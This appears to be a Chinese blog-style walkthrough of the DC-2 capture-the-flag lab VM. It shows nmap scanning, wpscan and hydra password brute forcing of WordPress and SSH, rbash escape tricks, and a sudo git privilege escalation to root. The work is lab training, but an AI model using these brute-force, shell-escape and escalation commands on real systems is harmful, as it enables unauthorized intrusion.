DC-2靶机实战 渗透测试

主机发现 信息搜集

nmap主机发现

我们的靶机地址是：192.168.0.131
nmap扫描

nmap -A -T4 -p- 192.168.0.131

80端口跑着http 7744端口跑着ssh

Flag1

访问下80

无法访问这里修改下hosts文件

linux中hosts文件位置 /etc/hosts
这回可以正常访问了，这里有个重定向直接跳转dc-2

在主页中找到找到了flag1

flag1中提示我们使用cewl。

Flag2

使用cewl创建字典

cewl dc-2 >cewl.dic

我们爬取下网站目录看是否能找到登陆后台。
使用dirb进行爬取

/wp-admin/就是登陆后台
使用wpscan查看网站都有哪些用户

wpsacn --url dc-2 -e u

发现了 admin、jerry、tom三个用户。将三个用户名保存到文档中 u.dic
有了用户名字典和之前cewl生成的字典，我们进行密码爆破

wpsacn -url dc-2 -U u.dic -P cewl.dic

尝试登陆后台，pages中发现了flag2

flag2中提示我们如果不能继续攻击 wordPress就想想其他方法吧，还记得7744端口跑的ssh吗，我们尝试下它，凎！

Flag3

使用hydra爆破ssh

hydra -L u.dic -P cewl.dic ssh://192.168.0.131 -s 7744 -o ssh.txt -V

用户：tom 密码：parturient
ssh登陆tom用户
目录下发现了flag3.txt但是cat命令不能使用

rbash逃逸
查看可以使用的命令

less、ls、vi命令可以使用
绕过方法：

• less绕过：$less test !‘sh’
• ls绕过:$man ls !‘sh’
• vi绕过:$vi test !/bin/sh 或 !/bin/bash

这里使用：

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

参考:https://www.cnblogs.com/xiaoxiaoleo/p/8450379.html

绕过成功，查看flag3.txt

Flag4

flag3中提示我们查看jerry用户。我们切换到jerry用户中。

su jerry

目录下发现了flag4

Final-flag

flag4告诉我们还没有结束，文中有一个git这是一个很重要的关键词。

无法切换到 root目录权限不够，那就是要提权喽。
查看下具有root权限的命令

sudo -l

看到了flag4中提示我们的git，我们使用git进行提权

sudo git help config 或 sudo git -p help
!/bin/bash

获得最后的flag

人生漫漫其修远兮，网安无止境。
一同前行，加油！